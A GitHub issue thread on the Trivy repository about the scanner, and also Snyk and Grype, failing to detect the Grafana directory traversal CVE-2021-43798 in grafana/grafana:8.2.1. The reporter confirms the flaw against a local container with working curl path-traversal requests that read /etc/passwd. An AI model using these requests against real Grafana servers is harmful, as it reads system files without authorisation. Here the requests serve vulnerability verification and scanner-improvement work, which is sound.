search

aquasecurity / trivy

Find vulnerabilities, misconfigurations, secrets, SBOM in containers, Kubernetes, code repositories, clouds and more
https://aquasecurity.github.io/trivy
Apache License 2.0
23.25k stars 2.3k forks source link

Trivy not detecting CVE-2021-43798: Grafana directory traversal ? #1459

Closed stefanlasiewski closed 2 years ago

stefanlasiewski commented 2 years ago

Description

Grafana issued a notice about CVE-2021-43798: Grafana directory traversal this week. It affects all Grafana 8.x instances.

https://grafana.com/blog/2021/12/08/an-update-on-0day-cve-2021-43798-grafana-directory-traversal/

However, Trivy doesn't seem to be picking it up. Why os this?

What did you expect to happen?

I expect this command to list CVE-2021-43798:

trivy --debug image --severity HIGH,CRITICAL grafana/grafana:8.2.1 |grep CVE-2021-43798

What happened instead?

It doesn't list this CVE:

$ trivy --debug image --severity HIGH,CRITICAL grafana/grafana:8.2.1 |grep CVE-2021-43798
$

Output of run with -debug:

2021-12-12T13:22:19.529-0800    DEBUG  Severities: HIGH,CRITICAL
2021-12-12T13:22:19.573-0800    DEBUG  cache dir:  /Users/USER/Library/Caches/trivy
2021-12-12T13:22:19.574-0800    DEBUG  DB update was skipped because DB is the latest
2021-12-12T13:22:19.574-0800    DEBUG  DB Schema: 1, Type: 1, UpdatedAt: 2021-12-12 18:40:08.31377395 +0000 UTC, NextUpdate: 2021-12-13 00:40:08.31377365 +0000 UTC, DownloadedAt: 2021-12-12 21:17:12.759986 +0000 UTC
2021-12-12T13:22:19.574-0800    DEBUG  Vulnerability type:  [os library]
2021-12-12T13:22:19.581-0800    DEBUG  Image ID: sha256:092a480a2531b3479d9c8591169723f2b49c79e8ec4b76b9f8aad3faaeb405ec
2021-12-12T13:22:19.581-0800    DEBUG  Diff IDs: [sha256:e2eb06d8af8218cfec8210147357a68b7e13f7c485b991c288c2d01dc228bb68 sha256:f865a4a4507d0e4e597a98697aacb4f32fe33e40bfe87c751ce7d4b4ccb0f6ff sha256:6b5061d1e966a1981e77ac13b2b3f3db7d0432e46c1f580442b7b0f6bbb66adf sha256:259ecfabcacfdfc827c042f41875cccc3eda532b2bbc40a0d2318302a1dbc1de sha256:bf9d934f4f2adbf028c4e223e087ae2efbb79165e20ab7f706b67207efb4e0bb sha256:5f70bf18a086007016e948b04aed3b82103a36bea41755b6cddfaf10ace3c6ef sha256:c83dbe321467a37a213390da75e76aedc0a850cba33409fbddc178b4ff659ce6 sha256:46abefb2a8e81cc2a20eae36faa15582f2b209d9d29a6902a1df227b69cb9f49]
2021-12-12T13:22:19.584-0800    INFO   Detected OS: alpine
2021-12-12T13:22:19.584-0800    INFO   Detecting Alpine vulnerabilities...
2021-12-12T13:22:19.584-0800    DEBUG  alpine: os version: 3.14
2021-12-12T13:22:19.584-0800    DEBUG  alpine: the number of packages: 34
2021-12-12T13:22:19.585-0800    INFO   Number of language-specific files: 2
2021-12-12T13:22:19.585-0800    INFO   Detecting gobinary vulnerabilities...
2021-12-12T13:22:19.585-0800    DEBUG  Detecting library vulnerabilities, type: gobinary, path: usr/share/grafana/bin/grafana-cli
2021-12-12T13:22:19.585-0800    DEBUG  Detecting library vulnerabilities, type: gobinary, path: usr/share/grafana/bin/grafana-server

grafana/grafana:8.2.1 (alpine 3.14.2)
=====================================
Total: 18 (HIGH: 18, CRITICAL: 0)

+------------+------------------+----------+-------------------+---------------+---------------------------------------+
|  LIBRARY   | VULNERABILITY ID | SEVERITY | INSTALLED VERSION | FIXED VERSION |                 TITLE                 |
+------------+------------------+----------+-------------------+---------------+---------------------------------------+
| busybox    | CVE-2021-42378   | HIGH     | 1.33.1-r3         | 1.33.1-r6     | busybox: use-after-free in            |
|            |                  |          |                   |               | awk applet leads to denial            |
|            |                  |          |                   |               | of service and possibly...            |
|            |                  |          |                   |               | -->avd.aquasec.com/nvd/cve-2021-42378 |
+            +------------------+          +                   +               +---------------------------------------+
|            | CVE-2021-42379   |          |                   |               | busybox: use-after-free in            |
|            |                  |          |                   |               | awk applet leads to denial            |
|            |                  |          |                   |               | of service and possibly...            |
|            |                  |          |                   |               | -->avd.aquasec.com/nvd/cve-2021-42379 |
+            +------------------+          +                   +               +---------------------------------------+
|            | CVE-2021-42380   |          |                   |               | busybox: use-after-free in            |
|            |                  |          |                   |               | awk applet leads to denial            |
|            |                  |          |                   |               | of service and possibly...            |
|            |                  |          |                   |               | -->avd.aquasec.com/nvd/cve-2021-42380 |
+            +------------------+          +                   +               +---------------------------------------+
|            | CVE-2021-42381   |          |                   |               | busybox: use-after-free in            |
|            |                  |          |                   |               | awk applet leads to denial            |
|            |                  |          |                   |               | of service and possibly...            |
|            |                  |          |                   |               | -->avd.aquasec.com/nvd/cve-2021-42381 |
+            +------------------+          +                   +               +---------------------------------------+
|            | CVE-2021-42382   |          |                   |               | busybox: use-after-free in            |
|            |                  |          |                   |               | awk applet leads to denial            |
|            |                  |          |                   |               | of service and possibly...            |
|            |                  |          |                   |               | -->avd.aquasec.com/nvd/cve-2021-42382 |
+            +------------------+          +                   +               +---------------------------------------+
|            | CVE-2021-42383   |          |                   |               | busybox: use-after-free in            |
|            |                  |          |                   |               | awk applet leads to denial            |
|            |                  |          |                   |               | of service and possibly...            |
|            |                  |          |                   |               | -->avd.aquasec.com/nvd/cve-2021-42383 |
+            +------------------+          +                   +               +---------------------------------------+
|            | CVE-2021-42384   |          |                   |               | busybox: use-after-free in            |
|            |                  |          |                   |               | awk applet leads to denial            |
|            |                  |          |                   |               | of service and possibly...            |
|            |                  |          |                   |               | -->avd.aquasec.com/nvd/cve-2021-42384 |
+            +------------------+          +                   +               +---------------------------------------+
|            | CVE-2021-42385   |          |                   |               | busybox: use-after-free in            |
|            |                  |          |                   |               | awk applet leads to denial            |
|            |                  |          |                   |               | of service and possibly...            |
|            |                  |          |                   |               | -->avd.aquasec.com/nvd/cve-2021-42385 |
+            +------------------+          +                   +               +---------------------------------------+
|            | CVE-2021-42386   |          |                   |               | busybox: use-after-free in            |
|            |                  |          |                   |               | awk applet leads to denial            |
|            |                  |          |                   |               | of service and possibly...            |
|            |                  |          |                   |               | -->avd.aquasec.com/nvd/cve-2021-42386 |
+------------+------------------+          +                   +               +---------------------------------------+
| ssl_client | CVE-2021-42378   |          |                   |               | busybox: use-after-free in            |
|            |                  |          |                   |               | awk applet leads to denial            |
|            |                  |          |                   |               | of service and possibly...            |
|            |                  |          |                   |               | -->avd.aquasec.com/nvd/cve-2021-42378 |
+            +------------------+          +                   +               +---------------------------------------+
|            | CVE-2021-42379   |          |                   |               | busybox: use-after-free in            |
|            |                  |          |                   |               | awk applet leads to denial            |
|            |                  |          |                   |               | of service and possibly...            |
|            |                  |          |                   |               | -->avd.aquasec.com/nvd/cve-2021-42379 |
+            +------------------+          +                   +               +---------------------------------------+
|            | CVE-2021-42380   |          |                   |               | busybox: use-after-free in            |
|            |                  |          |                   |               | awk applet leads to denial            |
|            |                  |          |                   |               | of service and possibly...            |
|            |                  |          |                   |               | -->avd.aquasec.com/nvd/cve-2021-42380 |
+            +------------------+          +                   +               +---------------------------------------+
|            | CVE-2021-42381   |          |                   |               | busybox: use-after-free in            |
|            |                  |          |                   |               | awk applet leads to denial            |
|            |                  |          |                   |               | of service and possibly...            |
|            |                  |          |                   |               | -->avd.aquasec.com/nvd/cve-2021-42381 |
+            +------------------+          +                   +               +---------------------------------------+
|            | CVE-2021-42382   |          |                   |               | busybox: use-after-free in            |
|            |                  |          |                   |               | awk applet leads to denial            |
|            |                  |          |                   |               | of service and possibly...            |
|            |                  |          |                   |               | -->avd.aquasec.com/nvd/cve-2021-42382 |
+            +------------------+          +                   +               +---------------------------------------+
|            | CVE-2021-42383   |          |                   |               | busybox: use-after-free in            |
|            |                  |          |                   |               | awk applet leads to denial            |
|            |                  |          |                   |               | of service and possibly...            |
|            |                  |          |                   |               | -->avd.aquasec.com/nvd/cve-2021-42383 |
+            +------------------+          +                   +               +---------------------------------------+
|            | CVE-2021-42384   |          |                   |               | busybox: use-after-free in            |
|            |                  |          |                   |               | awk applet leads to denial            |
|            |                  |          |                   |               | of service and possibly...            |
|            |                  |          |                   |               | -->avd.aquasec.com/nvd/cve-2021-42384 |
+            +------------------+          +                   +               +---------------------------------------+
|            | CVE-2021-42385   |          |                   |               | busybox: use-after-free in            |
|            |                  |          |                   |               | awk applet leads to denial            |
|            |                  |          |                   |               | of service and possibly...            |
|            |                  |          |                   |               | -->avd.aquasec.com/nvd/cve-2021-42385 |
+            +------------------+          +                   +               +---------------------------------------+
|            | CVE-2021-42386   |          |                   |               | busybox: use-after-free in            |
|            |                  |          |                   |               | awk applet leads to denial            |
|            |                  |          |                   |               | of service and possibly...            |
|            |                  |          |                   |               | -->avd.aquasec.com/nvd/cve-2021-42386 |
+------------+------------------+----------+-------------------+---------------+---------------------------------------+

usr/share/grafana/bin/grafana-cli (gobinary)
============================================
Total: 0 (HIGH: 0, CRITICAL: 0)

usr/share/grafana/bin/grafana-server (gobinary)
===============================================
Total: 0 (HIGH: 0, CRITICAL: 0)

Output of trivy -v:

$ trivy -v
Version: 0.21.2
Vulnerability DB:
  Type: Full
  Version: 1
  UpdatedAt: 2021-12-12 18:40:08.31377395 +0000 UTC
  NextUpdate: 2021-12-13 00:40:08.31377365 +0000 UTC
  DownloadedAt: 2021-12-12 21:17:12.759986 +0000 UTC

Additional details (base image name, container registry info...):

n/a

stefanlasiewski commented 2 years ago

I can confirm that this container version is vulnerable:

$ docker run --rm -d --name=grafana -p 3000:3000 grafana/grafana:8.2.1
94635778b7021e165ae5d1c88a6b5203ad10a527a6071ec4d64a2426b2550b3f
$ docker ps
CONTAINER ID   IMAGE                   COMMAND     CREATED         STATUS         PORTS                    NAMES
94635778b702   grafana/grafana:8.2.1   "/run.sh"   7 seconds ago   Up 6 seconds   0.0.0.0:3000->3000/tcp   grafana

$ curl --path-as-is http://localhost:3000/public/plugins/mysql/../../../../../VERSION
8.2.1
$ curl --path-as-is http://localhost:3000/public/plugins/mysql/../../../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
jerbia commented 2 years ago

@knqyf263 I suspect Grafana is not installed through a package manager, but it's deployed as a binary, which currently Trivy does not support?

afdesk commented 2 years ago

@stefanlasiewski thanks for your report! let me investigate it.

afdesk commented 2 years ago

@jerbia you're right, Grafana deployed as a binary, and trivy doesn't detect it.

stefanlasiewski commented 2 years ago

@afdesk Interesting. Is there a way for Trivy to detect this? Does Trivy look at the md5 sums of installed binaries, for example?

For the record, docker scan (which uses Snyk) doesn't find the vulnerability either:

$ docker scan --severity medium grafana/grafana:8.2.1

Testing grafana/grafana:8.2.1...

Organization:      stefanlasiewski
Package manager:   apk
Project name:      docker-image|grafana/grafana
Docker image:      grafana/grafana:8.2.1
Platform:          linux/amd64
Base image:        grafana/grafana:8.2.1
Licenses:          enabled

✓ Tested 34 dependencies for known issues, no vulnerable paths found.

Base Image             Vulnerabilities  Severity
grafana/grafana:8.2.1  11               0 critical, 0 high, 0 medium, 11 low

Recommendations for base image upgrade:

Minor upgrades
Base Image             Vulnerabilities  Severity
grafana/grafana:8.3.2  0                0 critical, 0 high, 0 medium, 0 low

And neither does Anchore's SBOM method with syft/grype (FTR: Grype's issue is at https://github.com/anchore/grype/issues/534 )

$ grype -q grafana/grafana:8.2.1
NAME                              INSTALLED                             FIXED-IN   VULNERABILITY        SEVERITY 
busybox                           1.33.1-r3                             1.33.1-r4  CVE-2021-42374       Medium    
busybox                           1.33.1-r3                             1.33.1-r5  CVE-2021-42375       Medium    
busybox                           1.33.1-r3                             1.33.1-r6  CVE-2021-42378       High      
busybox                           1.33.1-r3                             1.33.1-r6  CVE-2021-42379       High      
busybox                           1.33.1-r3                             1.33.1-r6  CVE-2021-42380       High      
busybox                           1.33.1-r3                             1.33.1-r6  CVE-2021-42381       High      
busybox                           1.33.1-r3                             1.33.1-r6  CVE-2021-42382       High      
busybox                           1.33.1-r3                             1.33.1-r6  CVE-2021-42383       High      
busybox                           1.33.1-r3                             1.33.1-r6  CVE-2021-42384       High      
busybox                           1.33.1-r3                             1.33.1-r6  CVE-2021-42385       High      
busybox                           1.33.1-r3                             1.33.1-r6  CVE-2021-42386       High      
github.com/cortexproject/cortex   v1.8.2-0.20210428155238-d382e1d80eaf             GHSA-jphm-g89m-v42p  Medium    
github.com/google/flatbuffers     v1.12.0                                          CVE-2020-35864       High      
github.com/grafana/loki           v1.6.2-0.20210520072447-15d417efe103             GHSA-grj5-8x6q-hc9q  Medium    
github.com/grafana/loki           v1.6.2-0.20210520072447-15d417efe103             CVE-2021-36156       Medium    
github.com/prometheus/prometheus  v1.8.2-0.20210621150501-ff58416a0b02             CVE-2019-3826        Medium    
google.golang.org/protobuf        v1.27.1                                          CVE-2015-5237        High      
ssl_client                        1.33.1-r3                             1.33.1-r4  CVE-2021-42374       Medium    
ssl_client                        1.33.1-r3                             1.33.1-r5  CVE-2021-42375       Medium    
ssl_client                        1.33.1-r3                             1.33.1-r6  CVE-2021-42378       High      
ssl_client                        1.33.1-r3                             1.33.1-r6  CVE-2021-42379       High      
ssl_client                        1.33.1-r3                             1.33.1-r6  CVE-2021-42380       High      
ssl_client                        1.33.1-r3                             1.33.1-r6  CVE-2021-42381       High      
ssl_client                        1.33.1-r3                             1.33.1-r6  CVE-2021-42382       High      
ssl_client                        1.33.1-r3                             1.33.1-r6  CVE-2021-42383       High      
ssl_client                        1.33.1-r3                             1.33.1-r6  CVE-2021-42384       High      
ssl_client                        1.33.1-r3                             1.33.1-r6  CVE-2021-42385       High      
ssl_client                        1.33.1-r3                             1.33.1-r6  CVE-2021-42386       High
afdesk commented 2 years ago

@stefanlasiewski in this case, trivy detected and checked two binary files grafana-cli and grafana-server (contains three medium vulnerabilities). but the app is a scope of files... need to think over it.

maybe i miss something

Thanks for your investigation!

github-actions[bot] commented 2 years ago

This issue is stale because it has been labeled with inactivity.

stefanlasiewski commented 2 years ago

Hi @afdesk Do you happen to have any fixes in mind for this? It's till happening on Trivy 0.23.

stefanl@stefanl:~ $ docker run --rm -d --name=grafana -p 3000:3000 grafana/grafana:8.2.1

stefanl@stefanl:~ $ curl --path-as-is http://localhost:3000/public/plugins/mysql/../../../../../VERSION
8.2.1stefanl@stefanl:~ $ curl --path-as-is http://localhost:3000/public/plugins/mysql/../../../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/ash
,,,
stefanl@stefanl:~ $ trivy --version
Version: 0.23.0
github-actions[bot] commented 2 years ago

This issue is stale because it has been labeled with inactivity.